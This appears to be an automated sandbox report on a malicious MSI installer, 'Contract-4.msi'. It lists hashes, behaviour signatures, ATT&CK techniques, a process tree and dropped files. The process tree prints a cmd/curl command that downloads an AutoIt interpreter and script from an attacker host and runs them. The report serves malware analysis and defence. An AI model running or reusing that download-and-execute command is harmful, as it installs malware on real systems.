ffd3edf21e63fee92fb9babbf56ccaddf2d78f58caeb6e6985a25aa4b8c519f1

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
09/10/2023, 13:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Contract-4.msi
Size

660KB
MD5

1b6f948f740eb0426204a9b15472b194
SHA1

724912fd27e5f1c115144173d38d6ed27357a3e5
SHA256

ffd3edf21e63fee92fb9babbf56ccaddf2d78f58caeb6e6985a25aa4b8c519f1
SHA512

8cdab05208446915152808c114dc3942d3620572ef9aeb9acdd990f8f68a6401b2d88182804ead33fc832b32aed13b634925bbd672b534b0fa931b1704077f4b
SSDEEP

12288:3tvRQ+gjpjegGdo8rgLKxBTi9byLw2wHvHgU3qfrbDW:3tncpVGPrgtyLHw33qjbD

Score

8^/10

discovery

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
788	KeyScramblerLogon.exe

Loads dropped DLL 2 IoCs

pid	Process
3224	MsiExec.exe
788	KeyScramblerLogon.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
876	ICACLS.EXE
4624	ICACLS.EXE

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	3732	msiexec.exe
11	3732	msiexec.exe
15	3732	msiexec.exe
18	3732	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e5809a0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAE8.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\e5809a0.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{6830E210-51DD-45C8-B907-00E61B5696FD}	msiexec.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4740	788	WerFault.exe	109

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000cda81468adccd8050000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000cda814680000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900cda81468000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dcda81468000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000cda8146800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4364	msiexec.exe
4364	msiexec.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3732	msiexec.exe
Token: SeSecurityPrivilege	4364	msiexec.exe
Token: SeCreateTokenPrivilege	3732	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3732	msiexec.exe
Token: SeLockMemoryPrivilege	3732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3732	msiexec.exe
Token: SeMachineAccountPrivilege	3732	msiexec.exe
Token: SeTcbPrivilege	3732	msiexec.exe
Token: SeSecurityPrivilege	3732	msiexec.exe
Token: SeTakeOwnershipPrivilege	3732	msiexec.exe
Token: SeLoadDriverPrivilege	3732	msiexec.exe
Token: SeSystemProfilePrivilege	3732	msiexec.exe
Token: SeSystemtimePrivilege	3732	msiexec.exe
Token: SeProfSingleProcessPrivilege	3732	msiexec.exe
Token: SeIncBasePriorityPrivilege	3732	msiexec.exe
Token: SeCreatePagefilePrivilege	3732	msiexec.exe
Token: SeCreatePermanentPrivilege	3732	msiexec.exe
Token: SeBackupPrivilege	3732	msiexec.exe
Token: SeRestorePrivilege	3732	msiexec.exe
Token: SeShutdownPrivilege	3732	msiexec.exe
Token: SeDebugPrivilege	3732	msiexec.exe
Token: SeAuditPrivilege	3732	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3732	msiexec.exe
Token: SeChangeNotifyPrivilege	3732	msiexec.exe
Token: SeRemoteShutdownPrivilege	3732	msiexec.exe
Token: SeUndockPrivilege	3732	msiexec.exe
Token: SeSyncAgentPrivilege	3732	msiexec.exe
Token: SeEnableDelegationPrivilege	3732	msiexec.exe
Token: SeManageVolumePrivilege	3732	msiexec.exe
Token: SeImpersonatePrivilege	3732	msiexec.exe
Token: SeCreateGlobalPrivilege	3732	msiexec.exe
Token: SeBackupPrivilege	1940	vssvc.exe
Token: SeRestorePrivilege	1940	vssvc.exe
Token: SeAuditPrivilege	1940	vssvc.exe
Token: SeBackupPrivilege	4364	msiexec.exe
Token: SeRestorePrivilege	4364	msiexec.exe
Token: SeRestorePrivilege	4364	msiexec.exe
Token: SeTakeOwnershipPrivilege	4364	msiexec.exe
Token: SeRestorePrivilege	4364	msiexec.exe
Token: SeTakeOwnershipPrivilege	4364	msiexec.exe
Token: SeBackupPrivilege	2592	srtasks.exe
Token: SeRestorePrivilege	2592	srtasks.exe
Token: SeSecurityPrivilege	2592	srtasks.exe
Token: SeTakeOwnershipPrivilege	2592	srtasks.exe
Token: SeBackupPrivilege	2592	srtasks.exe
Token: SeRestorePrivilege	2592	srtasks.exe
Token: SeSecurityPrivilege	2592	srtasks.exe
Token: SeTakeOwnershipPrivilege	2592	srtasks.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3732	msiexec.exe
3732	msiexec.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 4364 wrote to memory of 2592	4364	msiexec.exe	102
PID 4364 wrote to memory of 2592	4364	msiexec.exe	102
PID 4364 wrote to memory of 3224	4364	msiexec.exe	104
PID 4364 wrote to memory of 3224	4364	msiexec.exe	104
PID 4364 wrote to memory of 3224	4364	msiexec.exe	104
PID 3224 wrote to memory of 876	3224	MsiExec.exe	105
PID 3224 wrote to memory of 876	3224	MsiExec.exe	105
PID 3224 wrote to memory of 876	3224	MsiExec.exe	105
PID 3224 wrote to memory of 3744	3224	MsiExec.exe	108
PID 3224 wrote to memory of 3744	3224	MsiExec.exe	108
PID 3224 wrote to memory of 3744	3224	MsiExec.exe	108
PID 3224 wrote to memory of 788	3224	MsiExec.exe	109
PID 3224 wrote to memory of 788	3224	MsiExec.exe	109
PID 3224 wrote to memory of 788	3224	MsiExec.exe	109
PID 788 wrote to memory of 4800	788	KeyScramblerLogon.exe	110
PID 788 wrote to memory of 4800	788	KeyScramblerLogon.exe	110
PID 788 wrote to memory of 4800	788	KeyScramblerLogon.exe	110
PID 4800 wrote to memory of 4600	4800	cmd.exe	113
PID 4800 wrote to memory of 4600	4800	cmd.exe	113
PID 4800 wrote to memory of 4600	4800	cmd.exe	113
PID 3224 wrote to memory of 1492	3224	MsiExec.exe	115
PID 3224 wrote to memory of 1492	3224	MsiExec.exe	115
PID 3224 wrote to memory of 1492	3224	MsiExec.exe	115
PID 3224 wrote to memory of 4624	3224	MsiExec.exe	117
PID 3224 wrote to memory of 4624	3224	MsiExec.exe	117
PID 3224 wrote to memory of 4624	3224	MsiExec.exe	117
PID 4800 wrote to memory of 2496	4800	cmd.exe	119
PID 4800 wrote to memory of 2496	4800	cmd.exe	119
PID 4800 wrote to memory of 2496	4800	cmd.exe	119

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Contract-4.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3732

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2592
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E4823C6AA6AAA1DB5C0B46341DF4CE69
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:876
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:3744
- - C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerLogon.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerLogon.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au3
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4800
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -o Autoit3.exe http://piret-wismann.com:2351
        5⤵
        
        PID:4600
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt
        5⤵
        
        PID:2496
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 440
      4⤵
      Program crash
      PID:4740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\." /SETINTEGRITYLEVEL (CI)(OI)LOW
    3⤵
    - Modifies file permissions
    PID:4624

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 788 -ip 788
1⤵
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C42BC945025A34066DAB76EF3F80A05

Filesize
39KB

MD5
ac9cbdbc91959e9db6611dc0d38a5442

SHA1
5507e326ec8821c3edd262089c20245be0d75687

SHA256
46d56768c9e60bfdbc323a560e92551224ef82f919d3b63afbf3c82afa564985

SHA512
4f2720a86478bb32d9ba74d20f0acbe00f032400e4bbcd46486a18e854a0b7602cf08f3e1d36a018e818eb282ad7efb6ee95418739c5f9d2838707ed6bc0bad6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
727B

MD5
4e25d0434bd1f6cf35ee2c332255e571

SHA1
95a58811cbde3a2513d7fb8210e79545d45b8ab4

SHA256
8bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9

SHA512
09ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05

Filesize
314B

MD5
ea25df078133d37528d9b656908ce0a1

SHA1
2bce6426530a48cbd1e22fa4d10846fae468c873

SHA256
78732c96a4641ce2787d70d776272cdcd5588ce13140d69b87b630c6b63872df

SHA512
4a754613965bab8c36972bf7c94adcaf52c41fa98db893a5c195aa0127b6a7a5bc85e719f914bed29738edc67f882b2d0c748662b533db8e55aa893a5a74b61c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
478B

MD5
0794b6cd56de3b5df1f9f1ce5f2bbd25

SHA1
cb3dd48f8261792ec0c542dc2d99192333471611

SHA256
51231411d8f0b95dd7edc6c2330e4fbe89187e6a0f72fc4e98caf80eabcef020

SHA512
9b8af851570e89bb16ea1309dc2e2bf6accc64cb93ad4cdd24e1527dd06de54fbb067f9f596463460d5701758641119db0c493edc696476c66338bf6b5b025f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files.cab

Filesize
403KB

MD5
0c20650f04c9cf9f1ee4565de3f4f96d

SHA1
d679c0bd3c16c7114deafe9db8776da674b31cf0

SHA256
ebb29f7400503ad41a02f43a2847ac743a33f09c625e75503569bab56871cab8

SHA512
9cfcefd885b2c0688564ec26dbe6139d3910c2740b05b1b204476488fe3c3c5c1fcd6716f1c0e0bc5fdb483042bb73482f19772e012a6aed6845a500210a54c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerIE.DLL

Filesize
454KB

MD5
9e0ae735a86eb8f0dc472f267ebbb74c

SHA1
53ff35f13620da5a432cd5dfac933749f070b74d

SHA256
6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

SHA512
b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerIE.dll

Filesize
454KB

MD5
9e0ae735a86eb8f0dc472f267ebbb74c

SHA1
53ff35f13620da5a432cd5dfac933749f070b74d

SHA256
6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

SHA512
b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerLogon.exe

Filesize
500KB

MD5
c790ebfcb6a34953a371e32c9174fe46

SHA1
3ead08d8bbdb3afd851877cb50507b77ae18a4d8

SHA256
fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

SHA512
74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\files\KeyScramblerLogon.exe

Filesize
500KB

MD5
c790ebfcb6a34953a371e32c9174fe46

SHA1
3ead08d8bbdb3afd851877cb50507b77ae18a4d8

SHA256
fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

SHA512
74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\msiwrapper.ini

Filesize
458B

MD5
615b5c53a03d92cc208a0c8e689da431

SHA1
0efc0de0e1b539c323d5d98f48ad0cf5b97d6a35

SHA256
7095f3c31c47d001993e96a94a7d5bef375b5c16983b75ab7e61de3086c0cbf9

SHA512
b317a5803b42bdee07192e6ef0944b4f0120a52b2fa204c9832e254b3fbf9cfae7efb7ef3134dafe2df13f2528ae8cd30447fe23c7a6ecdd63b93dbbdf05de1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\msiwrapper.ini

Filesize
1KB

MD5
e571fad17dd924f493030bc9d4aa6b46

SHA1
be10a0d98368f40ffa32778aa6bbd224015430f5

SHA256
26b86a45170f0be48f4f3e679fec4f132e3410e7f796227c253cccd07b6ae03b

SHA512
10774195ecf35433a80c0245359b471419cd5ec95e692d181465b74bd108a30f2e8e99b7e37ab8fa48675eaee5f5868865c4ec5a057a4673b3e58e084628c2b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f80150e1-851d-48b9-b9a9-d91b2541cd72\msiwrapper.ini

Filesize
1KB

MD5
e571fad17dd924f493030bc9d4aa6b46

SHA1
be10a0d98368f40ffa32778aa6bbd224015430f5

SHA256
26b86a45170f0be48f4f3e679fec4f132e3410e7f796227c253cccd07b6ae03b

SHA512
10774195ecf35433a80c0245359b471419cd5ec95e692d181465b74bd108a30f2e8e99b7e37ab8fa48675eaee5f5868865c4ec5a057a4673b3e58e084628c2b0

Download Submit
C:\Windows\Installer\MSIAE8.tmp

Filesize
208KB

MD5
d82b3fb861129c5d71f0cd2874f97216

SHA1
f3fe341d79224126e950d2691d574d147102b18d

SHA256
107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

SHA512
244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

Download Submit
C:\Windows\Installer\MSIAE8.tmp

Filesize
208KB

MD5
d82b3fb861129c5d71f0cd2874f97216

SHA1
f3fe341d79224126e950d2691d574d147102b18d

SHA256
107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

SHA512
244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
0fa699597d2ecd7a64e2f02d207aff1e

SHA1
6433974d78955723273ed71e26aa2c44b6882f4d

SHA256
daeb44ff0c6b1be9028bc79df3321ebe658995155389f9250c2880ca9ba0e261

SHA512
6c88fade5aa1897f4005717b41596f6748f272c90a1b80f434524b5ded12b7d83bb9e5d6940630945a56d7532da7b788d97ff546e60fca96dcce9c6c07682a8b

Download Submit
\??\Volume{6814a8cd-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{2e339856-0f75-4aca-842a-6b0ca4b6ae9a}_OnDiskSnapshotProp

Filesize
5KB

MD5
0b80093e3c05d550f1ad60330f59a9ba

SHA1
df8a2f37dc98cf0040ac1c979bcb4b1c0f05ae60

SHA256
f3e243584f48e1f3f3f05d6d6c0fbb2082685b5e8f3c759446df6a0fca787729

SHA512
43fe75fbb54f82504c103bc97c3a0a91e9ee32bb45fd807966f1cd223108bb83549466413eb3de66c4d98f7b705af55fc23779a3b138496b5915e328d58e336c

Download Submit
memory/788-90-0x0000000002E20000-0x0000000002F20000-memory.dmp

Filesize
1024KB

Download
memory/788-93-0x0000000000400000-0x0000000000476000-memory.dmp

Filesize
472KB

Download
memory/788-94-0x0000000002E20000-0x0000000002F20000-memory.dmp

Filesize
1024KB

Download